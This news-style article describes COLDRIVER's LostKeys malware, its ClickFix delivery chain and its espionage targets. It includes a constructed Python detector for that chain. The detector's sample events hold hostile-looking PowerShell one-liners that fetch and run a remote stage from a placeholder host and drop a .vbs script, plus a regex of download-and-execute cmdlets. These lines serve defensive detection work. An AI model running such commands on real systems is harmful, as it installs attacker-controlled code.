The realm of cyber espionage has a new participant in the form of a stealthy malware known as “LostKeys.” Google has reported that a Russian state-backed group called COLDRIVER has been utilizing LostKeys since the beginning of this year to spy on Western governments, journalists, think tanks, and non-governmental organizations.
COLDRIVER is not a newcomer to the cyber espionage scene. In December, the UK and its “Five Eyes” intelligence allies publicly called out the group. COLDRIVER has direct ties to Russia’s Federal Security Service (FSB), a significant player in counterintelligence and internal security.
Google’s Threat Intelligence Group (GTIG) detected LostKeys in January. COLDRIVER has been using the malware in targeted “ClickFix” attacks, which rely on social engineering to trick individuals into running a malicious PowerShell script themselves. That script downloads and runs further malicious PowerShell, which ultimately installs LostKeys. Google classifies LostKeys as Visual Basic Script (VBS) data-theft malware that acts as a “digital vacuum cleaner,” extracting specific files and directories and sending system information back to the attackers.
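As an added illustration of how a defender might spot the ClickFix chain described above (this is not code from Google’s report, and the events, paths and URLs are all constructed), the following Python check scores PowerShell processes in Sysmon-style process-creation data and flags one when at least two chain indicators line up: launched from explorer.exe, a download-and-execute one-liner on the command line, and a child that runs a .vbs or fetches a further stage.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry) modelling the
# ClickFix chain: a pasted command makes explorer.exe launch PowerShell, which fetches
# a second stage and finally runs a .vbs. The last row is benign admin activity.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr https://stage.example.invalid/a)"'},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -c "Invoke-WebRequest https://stage.example.invalid/b -OutFile $env:TEMP\\k.vbs"'},
    {"pid": 700, "ppid": 500, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\k.vbs"},
    {"pid": 900, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\ops\backup.ps1"},
]

# Cmdlets/aliases commonly used to pull and run a remote stage from a one-liner.
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|iex|invoke-expression)\b", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def basename(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_clickfix_chains(events):
    """Return [(powershell_pid, [reasons])] for PowerShell processes with >= 2 chain indicators."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    hits = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        reasons = []
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) == "explorer.exe":
            reasons.append("launched from explorer.exe (Run box / pasted command)")
        if DOWNLOAD_RE.search(e["cmdline"]):
            reasons.append("download-and-execute cmdlet on the command line")
        for c in children.get(e["pid"], []):
            name = basename(c["image"])
            if name in SCRIPT_HOSTS and ".vbs" in c["cmdline"].lower():
                reasons.append(f"child {name} (pid {c['pid']}) running a .vbs")
            elif name == "powershell.exe" and DOWNLOAD_RE.search(c["cmdline"]):
                reasons.append(f"child PowerShell (pid {c['pid']}) fetching a further stage")
        if len(reasons) >= 2:  # a single indicator is common in benign admin use
            hits.append((e["pid"], reasons))
    return hits
```

On the sample data only the explorer-spawned PowerShell (pid 500) is flagged, with four reasons; the second-stage PowerShell and the scheduled backup script each carry at most one indicator and stay below the threshold.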
COLDRIVER’s usual modus operandi includes stealing login credentials to access emails and contacts. Additionally, they have been known to deploy another malware called SPICA for document and file theft. LostKeys appears to serve a similar purpose but is reserved for “highly selective cases,” indicating its specialized role in COLDRIVER’s espionage activities.
Interestingly, COLDRIVER is not the only state-sponsored group utilizing ClickFix attacks. Groups associated with North Korea (Kimsuky), Iran (MuddyWater), and other Russian actors (APT28 and UNK_RemoteRogue) have also employed similar tactics in recent spying campaigns.
COLDRIVER, also known as Star Blizzard and Callisto Group, has been refining its social engineering and open-source intelligence techniques since 2017. Its targets have included defense and government entities, NGOs, and politicians. Following Russia’s invasion of Ukraine, its attacks have escalated, expanding to defense-industrial sites and US Department of Energy facilities.
The US State Department has imposed sanctions on several COLDRIVER members, including an alleged FSB officer. A substantial $10 million reward is being offered by US authorities for any information leading to the apprehension of other group members, underscoring the seriousness with which the US views COLDRIVER.